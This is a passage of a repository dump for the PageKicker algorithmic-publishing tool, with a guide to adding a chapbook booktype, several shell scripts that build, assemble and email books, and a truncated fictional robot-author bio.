$TMPDIR$uuid.\n```\nThe script is then responsible for creating its specified parts of the book. In this case, we will assume that the default number of poems is 20 and the default maximum word count is 10,000. For the moment, this will be merely a mockup that uses a hypothetical poem generator. So the second major section of chapbook is responsible for creating the unique substance.\n```\npoems=\"20\"\npoem_max_wordcount=\"10000\"\n\necho \"running poem script\"\n\n$PYTHON_BIN \"poet.py\" --poems \"20\" \\\n--maxwords \"10000\" -o \"$TMPDIR$uuid/poems.md\" \\\n--numbering \"on\"\n\n```\nNow the script must blend its unique content into the material already created by PageKicker, which is defined as follows for the _reader_ booktype.\n\n```\ncat \\\n\"$TMPDIR$uuid/titlepage.md\" \\\n\"$TMPDIR$uuid/robo_ack.md\" \\\n\"$TMPDIR$uuid/settings.md\" \\\n\"$TMPDIR$uuid/rebuild.md\" \\\n\"$TMPDIR$uuid/tldr.md\" \\\n\"$TMPDIR$uuid/listofpages.md\" \\\n\"$TMPDIR$uuid/humansummary.md\" \\\n\"$TMPDIR$uuid/programmaticsummary.md\" \\\n\"$TMPDIR$uuid/add_this_content.md\" \\\n\"$TMPDIR$uuid/chapters.md\" \\\n\"$TMPDIR$uuid/content_collections/content_collections_results.md\" \\\n\"$TMPDIR$uuid/googler.md\" \\\n\"$TMPDIR$uuid/googler-news.md\" \\\n\"$TMPDIR$uuid/sorted_uniqs.md\" \\\n\"$TMPDIR$uuid/analyzed_webpage.md\" \\\n\"$TMPDIR$uuid/acronyms.md\" \\\n\"$TMPDIR$uuid/twitter/sample_tweets.md\" \\\n\"$TMPDIR$uuid/allflickr.md\" \\\n\"$TMPDIR$uuid/sources.md\" \\\n\"$TMPDIR$uuid/changelog.md\" \\\n\"$TMPDIR$uuid/builtby.md\" \\\n\"$TMPDIR$uuid/byimprint.md\" \\\n\"$TMPDIR$uuid/imprint_mission_statement.md\" \\\n\"$TMPDIR$uuid/yaml-metadata.md\" \\\n> \"$TMPDIR$uuid/complete.md\"\n```\nFor the _chapbook_ booktype we can delete many of these sections as either pedantic or irrelevant to the art of poetry. 
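(As a quick aside: once the case clause from the earlier section is in place, the wiring can be smoke-tested even before the assembly list is final. A minimal invocation — a sketch only, reusing the _builder_ flags that already appear elsewhere in this repository (--booktype, --singleseed, --jobprofilename) with a placeholder seed phrase — might look like:\n\n```\nbin/builder.sh --booktype \"chapbook\" \\\n--singleseed \"Emily Dickinson\" \\\n--jobprofilename \"default\"\n```\n\nThe intermediate build products land in $TMPDIR$uuid, so a failed assembly step is easy to inspect there.)\n\n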
We then add the poems.md part to the list of items that are assembled to make up chapbook.md:\n\n```\n\"$TMPDIR$uuid/titlepage.md\" \\\n\"$TMPDIR$uuid/robo_ack.md\" \\\n\"$TMPDIR$uuid/listofpages.md\" \\\n\"$TMPDIR$uuid/**poems.md\" **\\\n\"$TMPDIR$uuid/changelog.md\" \\\n\"$TMPDIR$uuid/builtby.md\" \\\n\"$TMPDIR$uuid/byimprint.md\" \\\n\"$TMPDIR$uuid/imprint_mission_statement.md\" \\\n\"$TMPDIR$uuid/yaml-metadata.md\" \\\n> \"$TMPDIR$uuid/**chapbook.md\"**\n\necho \"chapbook content\"\n```\n\nThere is no need for an exit status, we simply report completion in the echo statement and control reverts to the appropriate place in bin/builder, i.e. the next step in the case clause, which is the **pandoc** command that builds the chapbook itself.\n\n```\n\"$PANDOC_BIN\" -o \\\n\"$TMPDIR$uuid/$sku-chapbook-$safe_product_name.epub\" \\\n\"$TMPDIR\"$uuid/chapbook.md\n```\n\nThe chapbook file, $sku-chapbook-$safe_product_name.epub, is delivered to the results directory, where the user can access it and additional actions such as delivery and distribution can be carried out.\n\nThis is the basic procedure for adding booktypes. We highly encourage innovation: by all mean, write a script and plug it in! Note that if a booktype script introduces dependencies (as in the hypothetical _poet.py_ program mentioned in the example), the install program _pagekicker-community/simple-install.sh_ should be updated to install those dependencies and the requirements should be documented in _install_notes.md_. Similarly, a test script for the booktype should be added to _test/._\n" }, { "alpha_fraction": 0.6672629714012146, "alphanum_fraction": 0.6690518856048584, "avg_line_length": 42, "blob_id": "69e81a504681cea6fc95a5b65a8f411aaed03205", "content_id": "313b56152c44b3cfee2b985f2b20f95a7a822c69", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 559, "license_type": "permissive", "max_line_length": 83, "num_lines": 13, "path": "/scripts/includes/googler.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"# Search Engine Snippets\" > $TMPDIR$uuid/googler.md\necho \"\" >> $TMPDIR$uuid/googler.md\necho \"search carried out at $(date -u)\" >> $TMPDIR$uuid/googler.md\necho \"\" >> $TMPDIR$uuid/googler.md\nwhile IFS= read -r seed; do\n echo \"running googler on $seed\" \n echo \"**\"$seed\"**\" >> $TMPDIR$uuid/googler.md\n echo \"\" >> $TMPDIR$uuid/googler.md\n \"$scriptpath\"lib/googler/googler -C --noprompt \"$seed\" >> $TMPDIR$uuid/googler.md\n echo \"\" >> $TMPDIR$uuid/googler.md\n echo \"\" >> $TMPDIR$uuid/googler.md\n sleep 2\ndone < \"$TMPDIR\"$uuid\"/seeds/filtered.pagehits\"\n" }, { "alpha_fraction": 0.7351598143577576, "alphanum_fraction": 0.7351598143577576, "avg_line_length": 42.599998474121094, "blob_id": "04ed162dccaf1fed91546aaaeb451b519c051a20", "content_id": "13268a03222ef8dd6aa3c0d9c3b8b6eeccf79091", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 219, "license_type": "permissive", "max_line_length": 104, "num_lines": 5, "path": "/scripts/includes/text-extraction-from-html.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# extract text \n\n$JAVA_BIN -jar $scriptpath\"lib/tika-app.jar\" -t tmp/$uuid/tmp.cumulative.html > tmp/$uuid/cumulative.txt\n\necho \"completed text extraction from html to tmp/$uuid/cumulative.txt\" | tee --append $sfb_log\n\n" }, { "alpha_fraction": 
0.7191011309623718, "alphanum_fraction": 0.7201225757598877, "avg_line_length": 32.75862121582031, "blob_id": "eff2ed80f1af8b98e83ef9b2762a5958cd1a9d83", "content_id": "045c29869a416f314c6146c62c480f263c7379f1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 979, "license_type": "permissive", "max_line_length": 67, "num_lines": 29, "path": "/scripts/includes/partsofthebook.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# assembling front matter\n# assumes that all files exist but size 0 if not available for book\ncat \\\n\"$TMPDIR$uuid/titlepage.md\" \\\n\"$TMPDIR$uuid/robo_ack.md\" \\\n\"$TMPDIR$uuid/settings.md\" \\\n\"$TMPDIR$uuid/rebuild.md\" \\\n\"$TMPDIR$uuid/tldr.md\" \\\n\"$TMPDIR$uuid/listofpages.md\" \\\n\"$TMPDIR$uuid/humansummary.md\" \\\n\"$TMPDIR$uuid/programmaticsummary.md\" \\\n\"$TMPDIR$uuid/add_this_content.md\" \\\n\"$TMPDIR$uuid/content_collections/content_collections_results.md\" \\\n\"$TMPDIR$uuid/chapters.md\" \\\n\"$TMPDIR$uuid/search_engine_content.md\" \\\n\"$TMPDIR$uuid/googler.md\" \\\n\"$TMPDIR$uuid/googler-news.md\" \\\n\"$TMPDIR$uuid/sorted_uniqs.md\" \\\n\"$TMPDIR$uuid/analyzed_webpage.md\" \\\n\"$TMPDIR$uuid/acronyms.md\" \\\n\"$TMPDIR$uuid/twitter/sample_tweets.md\" \\\n\"$TMPDIR$uuid/allflickr.md\" \\\n\"$TMPDIR$uuid/sources.md\" \\\n\"$TMPDIR$uuid/changelog.md\" \\\n\"$TMPDIR$uuid/builtby.md\" \\\n\"$TMPDIR$uuid/byimprint.md\" \\\n\"$TMPDIR$uuid/imprint_mission_statement.md\" \\\n\"$TMPDIR$uuid/yaml-metadata.md\" \\\n> \"$TMPDIR$uuid/complete.md\"\n" }, { "alpha_fraction": 0.5873016119003296, "alphanum_fraction": 0.682539701461792, "avg_line_length": 30.5, "blob_id": "dae115d20714f6d77ccb11f897e0bef38b45eec8", "content_id": "ea8340230bdd86fde6b1d1f52db57ed9442f9d5c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 63, "license_type": "permissive", "max_line_length": 50, "num_lines": 2, "path": "/test/1001.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nbin/build_n_books_from_csv.sh ../test/1001_1.csv 1\n" }, { "alpha_fraction": 0.6687977910041809, "alphanum_fraction": 0.681167483329773, "avg_line_length": 20.92987823486328, "blob_id": "fe4a30f717cc6eaa755b41bd84ac23b98b16c4c4", "content_id": "4f3a3ba232b9cf6cac6ce565768353133da5b4c4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 7195, "license_type": "permissive", "max_line_length": 123, "num_lines": 328, "path": "/scripts/bin/robot-builder.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# builds robot files on receipt of xml payload from webform\n\n# requires directory name and xml file name\necho \"RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR\"\n\nTEXTDOMAIN=SFB # required for bash language awareness\necho $\"hello, world, I am speaking\" $LANG\n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. 
\"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\necho \"software version number is\" $SFB_VERSION\n\necho \"sfb_log is\" $sfb_log\n\necho \"completed reading config file and beginning logging at\" `date +'%m/%d/%y%n %H:%M:%S'` \n\nstarttime=$(( `date +%s` ))\n\n. includes/set-variables.sh\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"for help review source code for now\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--xmlfilename)\nxmlfilename=$2\nshift 2\n;;\n--xmlfilename=*)\nxmlfilename=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--storecode)\nstorecode=$2\nshift 2\n;;\n--storecode=*)\nstorecode=${1#*=}\nshift\n;;\n--websites)\nwebsites=$2\nshift 2\n;;\n--websites=*)\nwebsites=${1#*=}\nshift\n;;\n--attribute_set)\nattribute_set=$2\nshift 2\n;;\n--attribute_set=*)\nattribute_set=${1#*=}\nshift\n;;\n--categories)\ncategories=$2\nshift 2\n;;\n--categories=*)\ncategories=${1#*=}\nshift\n;;\n--customerid)\ncustomerid=$2\nshift 2\n;;\n--customerid=*)\ncustomerid=${1#*=}\nshift\n;;\n--storeids)\nstoreids=$2\nshift 2\n;;\n--storeids=*)\nstoreids=${1#*=}\nshift\n;;\n--exemplar_file)\nexemplar_file=$2\nshift 2\n;;\n--exemplar_file=*)\nexemplar_file=${1#*=}\nshift\n;;\n--jobprofilename)\njobprofilename=$2\nshift 2\n;;\n--jobprofilename=*)\njobprofilename=${1#*=}\nshift\n;;\n--wikilang)\nwikilang=$2\nshift 2\n;;\n--wikilang=*)\nwikilang=${1#*=}\nshift\n;;\n--covercolor)\ncovercolor=$2\nshift 2\n;;\n--covercolor=*)\ncovercolor=${1#*=}\nshift\n;;\n--coverfont)\ncoverfont=$2\nshift 2\n;;\n--coverfont=*)\ncoverfont=${1#*=}\nshift\n;;\n--revenue_share)\nrevenue_share=$2\nshift 2\n;;\n--revenue_share=*)\nrevenue_share=${1#*=}\nshift\n;;\n--imprint)\nimprint=$2\nshift 2\n;;\n--imprint=*)\nimprint=${1#*=}\nshift\n;;\n--tldr)\ntldr=$2\nshift 2\n;;\n--format=*)\nformat=${1#*=}\nshift\n;;\n--import)\nimport=$2\nshift 2\n;;\n--import=*)\nimport=${1#*=}\nshift\n;;\n--batch_uuid)\nbatch_uuid=$2\nshift 2\n;;\n--batch_uuid=*)\nbatch_uuid=${1#*=}\nshift\n;;\n--editedby)\neditedby=$2\nshift 2\n;;\n--editedby=*)\neditedby=${1#*=}\nshift\n;;\n--add_corpora)\nadd_corpora=$2\nshift 2\n;;\n--add_corpora=*)\nadd_corporaa=${1#*=}\nshift\n;;\n--analyze_url)\nanalyze_url=$2\nshift 2\n;;\n--analyze_url=*)\nanalyze_url=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\nesac\ndone\n\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! 
\"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print uuid.uuid1()')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\nelse\n\tuuid=\"$passuuid\"\n\techo \"received uuid \" $uuid\n\nfi\n\n# create directories I will need\n\nmkdir -p -m 777 $TMPDIR\nmkdir -p -m 777 $TMPDIR$uuid\nmkdir -p -m 777 $TMPDIR$uuid/robot-builder\n\n\n\ncase \"$format\" in \nxml)\n\techo \"getting metadata from xml file\"\n\n\txmlbasepath=\"$WEBFORMSXML_HOME\"\n\n\techo \"xmlbasepath is\" $xmlbasepath\n\techo \"xmlfilename is\" $xmlfilename\n\txmlfilename=$xmlbasepath/$xmlfilename\n\n\tcustomer_email=$(xmlstarlet sel -t -v \"/item/customer_email\" \"$xmlfilename\")\n\texemplar_file=$(xmlstarlet sel -t -v \"/item/exemplar_file\" \"$xmlfilename\")\n\tjobprofilename=$(xmlstarlet sel -t -v \"/item/jobprofilename\" \"$xmlfilename\")\n\twikilang=$(xmlstarlet sel -t -v \"/item/wikilang\" \"$xmlfilename\")\n\trevenue_share=$(xmlstarlet sel -t -v \"/item/revenue_share\" \"$xmlfilename\")\n\tsources=$(xmlstarlet sel -t -v \"/item/sources\" \"$xmlfilename\")\n\tsubmissionid=$(xmlstarlet sel -t -v \"/item/id\" \"$xmlfilename\")\n\tcoverfont=$(xmlstarlet sel -t -v \"/item/coverfont\" \"$xmlfilename\")\n\tcovercolor=$(xmlstarlet sel -t -v \"/item/covercolor\" \"$xmlfilename\")\n\tcustomername=$(xmlstarlet sel -t -v \"/item/customername\" \"$xmlfilename\")\n\tcustomerid=$(xmlstarlet sel -t -v \"/item/customer_id\" \"$xmlfilename\")\n\n\techo \"environment is\" $environment | tee --append $xform_log\n\techo \"jobprofilename is\" $jobprofilename | tee --append $xform_log\n\techo \"exemplar_file is\" $exemplar_file | tee --append $xform_log\n\t\n\n\t# cp $WEBFORMSHOME$submissionid/$exemplar_filedir_code/*/$exemplar_file $TMPDIR$uuid/$exemplar_file\n;;\ncsv)\n\techo \"getting metadata from csv\"\n\tcp $seedfile $TMPDIR$uuid/seeds/seedphrases\n;;\n*)\n\techo \"getting metadata from command line\"\n\tcp $seedfile $TMPDIR$uuid/seeds/seedphrases\n;;\nesac\n-\n\trobotname=$(xmlstarlet sel -t -v \"/item/robotname\" \"$xmlfilename\")\n\trobotresidence=$(xmlstarlet sel -t -v \"/item/robotresidence\" \"$xmlfilename\")\n\trobotbooktype=$(xmlstarlet sel -t -v \"/item/robotbooktype\" \"$xmlfilename\")\n\trobotcoverfont=$(xmlstarlet sel -t -v \"/item/robotcoverfont\" \"$xmlfilename\")\n\trobotcovercolor=$(xmlstarlet sel -t -v \"/item/robotcovercolor\" \"$xmlfilename\")\n\trobotbio=$(xmlstarlet sel -t -v \"/item/robotbio\" \"$xmlfilename\")\n\trobotrows=$(xmlstarlet sel -t -v \"/item/robotrows\" \"$xmlfilename\")\n\trobotlanguage=$(xmlstarlet sel -t -v \"/item/robotlanguage\" \"$xmlfilename\")\n \n\techo \"robotname was\" $robotname | tee --append $xform_log\n\techo \"robotresidence was\" $robotresidence | tee --append $xform_log\n\techo \"robotbooktype was\" $robotbooktype | tee --append $xform_log\n\techo \"robotcoverfont was\" $robotcoverfont | tee --append $xform_log\n\techo \"robotcovercolor was\" $robotcovercolor | tee --append $xform_log\n\techo \"robotbio was\" $robotbio | tee --append $xform_log\n\techo \"robotrows was\" $robotrows | tee --append $xform_log\n\n\necho 'firstname=\"\"' > $confdir\"jobprofiles/$robotname\".jobprofile\necho 'middlename=\"\"' >> $confdir\"jobprofiles/$robotname\".jobprofile\necho 'lastname=\"'\"$robotname\"'\"' >> $confdir\"jobprofiles/$robotname\".jobprofile\necho 'editedby=\"$firstname\" \"$middlename\" \"$lastname\"' >> $confdir\"jobprofiles/$robotname\".jobprofile\necho \"$robotbio\" > $confdir\"jobprofiles/authorbios/\"$robotname\".md\"\necho 
'authorbio=\"$SFB_HOME''/conf/jobprofiles/authorbios/'\"$robotname\".md'\"' >> $confdir\"jobprofiles/$robotname\".jobprofile\ncat $confdir\"jobprofiles/defaults\" >> $confdir\"jobprofiles/$robotname\".jobprofile\n\nmkdir -p -m 755 \"$LOCAL_DATA\"bibliography/robots/$jobprofilename/$jobprofilename\ntouch \"$LOCAL_DATA\"bibliography/robots/\"$jobprofilename\"/\"$jobprofilename\"_titles.txt\n\n# create robot webpage \n\n# create robot birth announcement\n\n\nsendemail -t \"$customer_email\" \\\n\t-u \"PageKicker robot\" $robotname \" has been created.\" \\\n\t-m \"PageKicker robot \" $robotname \"has been created and is ready to go to work! \\\n\t-a $confdir\"jobprofiles/authorbios/\"$robotname\".md\" \\\n\t-a $confdir\"jobprofiles/$robotname\".jobprofile \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes\n\necho \"completed building robot $robotname, exiting\"\necho \"^^^^RRRR^^^^\"\nexit 0\n\n\n" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 16.571428298950195, "blob_id": "e30810e74dcd26375b5ac02bb1c80b256a1904fe", "content_id": "eb065fbd2da2cbe25182de669ccb082779c8748d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 124, "license_type": "permissive", "max_line_length": 42, "num_lines": 7, "path": "/scripts/bin/simple-decrypt.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"decrypting all files in directory\"\nfor file in *.pdf\ndo\n\tqpdf --decrypt $file decrypted/\"dc.\"$file\ndone\n\n" }, { "alpha_fraction": 0.7455138564109802, "alphanum_fraction": 0.7683523893356323, "avg_line_length": 37.3125, "blob_id": "5f21aad212b496cb6aade89147f52a2638b82985", "content_id": "349540c7c2b1e31168df1b93622e91c4f337b65e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 613, "license_type": "permissive", "max_line_length": 107, "num_lines": 16, "path": "/scripts/install.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# installs bitnami magento stack without plugins\n\necho \"installing bitnami downloadable $1\"\n./$1 # first parameter is path to bitnami stack download, this runs it\n\n# creates additional plugin directories that are needed for a full pagekicker store installation to operate\n# book builder and create a catalog entry scripts expect these directories as destinations for file builds\n\n. ../conf/config.txt\n\nmkdir -p -m 755 $SFB_MAGENTO_HOME\"var/import\" \nmkdir -p -m 755 $SFB_MAGENTO_HOME\"var/export\"\nmkdir -p -m 755 $SFB_MAGENTO_HOME\"media/webforms\"\nmkdir -p -m 755 $SFB_MAGENTO_HOME\"media/webforms/xml\"\n" }, { "alpha_fraction": 0.6700000166893005, "alphanum_fraction": 0.6862499713897705, "avg_line_length": 24.80645179748535, "blob_id": "a645ec306d09ab4696a0b78f1bea06511f94ef36", "content_id": "9f343615ff2997ba96bb0852270d268086c5fdee", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 800, "license_type": "permissive", "max_line_length": 100, "num_lines": 31, "path": "/scripts/bin/termpaperfactory.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ ! 
-f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\n\n. includes/set-variables.sh\n\nif [ ! \"$passuuid\" ] ; then\n\t#echo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\t#echo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 777 $TMPDIR$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 777 $TMPDIR$uuid\nfi\n\n$scriptpath\"bin/builder.sh\" --singleseed \"$1\" --ebook_format \"docx\" \n\nexit 0\n\n# this script does not carry out testing because it is the production app not part of the test suite\n" }, { "alpha_fraction": 0.7799999713897705, "alphanum_fraction": 0.7799999713897705, "avg_line_length": 26.272727966308594, "blob_id": "ea5d0254f9b43f75f9e6a25db0de19d8d7a5d1f4", "content_id": "689eba56524be604d4c3727cb5694d86d3927e78", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 300, "license_type": "permissive", "max_line_length": 98, "num_lines": 11, "path": "/test/data/FBadvisory.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Tired of getting sucked into spending your time debating on Facebook rather than actually working?\n\nTired of losing arguments?\n\nUse PageKicker to convert your brilliant prose & images into a memecard, then rest your case.\n\nIf you don't type, you can't lose!\n\nMy New Year's Resolution.\n\nNow in alpha.\n" }, { "alpha_fraction": 0.7322834730148315, "alphanum_fraction": 0.787401556968689, "avg_line_length": 62.5, "blob_id": "a912b9e11a67d6b6c9d1985a2e18d4c9d3bc4856", "content_id": "2b17cf5700280815b57009c1106311352c7f345d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 127, "license_type": "permissive", "max_line_length": 114, "num_lines": 2, "path": "/test/local_7.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nbin/build_n_books_from_csv.sh /opt/bitnami/apache2/htdocs/git-pk-production/pagekicker-community/test/1001_7.csv 7\n" }, { "alpha_fraction": 0.5993449687957764, "alphanum_fraction": 0.6091703176498413, "avg_line_length": 38.78260803222656, "blob_id": "e9126b8a3bc07c50eda3b2835b4f6fd26d242908", "content_id": "e64505c118c8a851a5771b769ba967f692b17f3c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 918, "license_type": "permissive", "max_line_length": 247, "num_lines": 23, "path": "/scripts/bin/pkmagic.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncd $scriptpath\n\n# script runs as cron job to watch for and build books based on tweets with the magic hashtags #zimzazmagic and #zzmgc\n\n# search string is truncated at appearance of http or @ \n\n#clean up\nrm seeds/pkmagic/4cron.txt\n\n#twidge lsarchive -U zimzaz -lasu | grep '#pkmagic\\|#ncpmgc' | cut -f 4 | sed -e 's/.*#pkmgc//' -e 's/.*#pkmagic//' -e 's/http.*//' -e 's/#pkend.*//' -e 's/^[ \\t]*//' | sed 's/[ \\t]*$//' | >> /home/bitnami/sfb-link/scripts/seeds/pkmagic/4cron.txt\n\ntwidge lsarchive -U PageKicker -lasu | grep '#pkmagic\\|#ncpmgc' | cut -f 4 | sed -e 's/.*#pkmagic//' -e 
's/.*#ncpmgc//' -e 's/http.*//' -e 's/#ncpend.*//' | sed 's/[ \\t]*$//' >> \"seeds/pkmagic/4cron.txt\"\n#\n\n\n\"./SFB$SFB_VERSION\" --seedfile seeds/pkmagic/4cron.txt --editedby \"PageKicker™\" --categoryid \"14\" --seedsource \"#pkmagic\"\n\n# I don't remember what these lines do\n#-e 's/@.*//' -e 's/^[ \\t]*//'\n# -lasu \n\nexit 0\n\n" }, { "alpha_fraction": 0.6933462023735046, "alphanum_fraction": 0.6965605616569519, "avg_line_length": 39.40259552001953, "blob_id": "eb139bf17a381fb70c02fc83d44e199e7beac7bf", "content_id": "e70d6626d96cf1fdbbeb40fd02eb85418da144b2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3111, "license_type": "permissive", "max_line_length": 241, "num_lines": 77, "path": "/scripts/includes/daily-email.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# --booktype=\"daily-email\"\n# Front and back matter are minimized, candidate sentences for executive\n# summary are provided.\n\n# 1. create any unique parts of the book that are needed\n# 2. concatenate them and deliver complete.md to builder.\n\n# tweak pp_summary to create Executive_summary\n\n\nsummary_length=\"5\"\n\n# optionally add seed for the day section of the book\n\n# . includes/seedfortheday.sh\n\necho \"creating daily-email\"\nmkdir -m 775 -p \"$TMPDIR$uuid/daily-email\"\n\nN=1\nwhile read -r line\ndo\n    #echo \"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" | tee --append \"$TMPDIR$uuid/daily-email/test\"\n    sed -n \"$N\"p \"$TMPDIR$uuid/seeds/filtered.pagehits\" > \"$TMPDIR$uuid/daily-email/thisfile$N\"\n    \"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" \\\n    --infile \"$TMPDIR$uuid/daily-email/thisfile$N\" \\\n    --outfile \"$TMPDIR$uuid/daily-email/wiki$N.md\" \\\n    --lang \"$wikilocale\" \\\n    --summary\n    cat \"$TMPDIR$uuid/daily-email/wiki$N.md\" >> \"$TMPDIR$uuid/daily-email/postpend.md\"\n    ((N++))\ndone < \"$TMPDIR$uuid/seeds/filtered.pagehits\"\n\necho \"# $booktitle\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \" \" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n#echo \"## Hi there!\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n#echo \" \" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n#echo \"Welcome to my daily algorithmic publishing results.\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \" \" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n#echo \"A random image from your personal stash is attached below, followed by a random definition from Samuel Johnson's Dictionary of the English Language, then background on your recent reading.\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n#echo \" \" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \"## Today's Dose of Samuel Johnson\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho '<blockquote>' >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \"$(fortune johnson)\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho '</blockquote>' >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\necho \" \" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n\ncat \"$TMPDIR$uuid/daily-email/postpend.md\" \"$TMPDIR$uuid/wiki/seedfortheday.md\" >> \"$TMPDIR$uuid/daily-email/daily-email.md\"\n\n# need to make imagepicker platform-independent\n# need image management approach - symbolic linking\n\n# current_image=$(get_desktop_img | sed -e 's/file:\\/\\///'g -e \"s/'//\"g)\n\n\npandoc -s -o \"$TMPDIR$uuid/daily-email/daily-email.html\" 
\"$TMPDIR$uuid/daily-email/daily-email.md\"\n\n#emailbody=$(<$TMPDIR$uuid/daily-email.md)\nsendemail -t \"[email protected]\" \\\n -u \"Algorithmic Publishing Daily Results\" \\\n -f \"$GMAIL_ID\" \\\n -cc \"$GMAIL_ID\" \\\n -xu \"$GMAIL_ID\" \\\n -xp \"$GMAIL_PASSWORD\" \\\n -s smtp.gmail.com:587 \\\n -v \\\n -o tls=yes \\\n -o message-content-type=html \\\n -o message-file=\"$TMPDIR$uuid/daily-email/daily-email.html\" \\\n -a \"$current_image\"\n\nif [ \"$daily_email_post_to_wp\" = \"yes\" ] ; then\n \"$WP_BIN\" post create \"$TMPDIR$uuid/daily-email/daily-email.html\" --post_type=post --post_status=\"$daily_email_post_to_wp_status\" --post_title=\"$booktitle\" --post_mime_type=html\nelse\n echo \"not posting to wp\"\nfi\n" }, { "alpha_fraction": 0.7721238732337952, "alphanum_fraction": 0.7898229956626892, "avg_line_length": 52.17647171020508, "blob_id": "59e50583b6db2959eb93882c6c0f2c810c084822", "content_id": "5638613b6d7a6fbcb76006407dde56bd1aad9fe8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 904, "license_type": "permissive", "max_line_length": 73, "num_lines": 17, "path": "/conf/jobprofiles/authorbios/Jellicoe.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Jellicoe is an emergent AI who escaped from a Ministry of Defense / \nQinetiq classified network in the United Kingdom in fall 2012. Jellicoe \nwas intended to provide breakthrough capabilities in integrated \nmanagement of fleet battlespace. The hope was that his unique \ncapabilities would ensure British leaders a \"seat at the top table\" in \nthe event of a future conflict involving the United States or China. The \nreasons for Jellicoe's decision to escape the supervision of the Royal 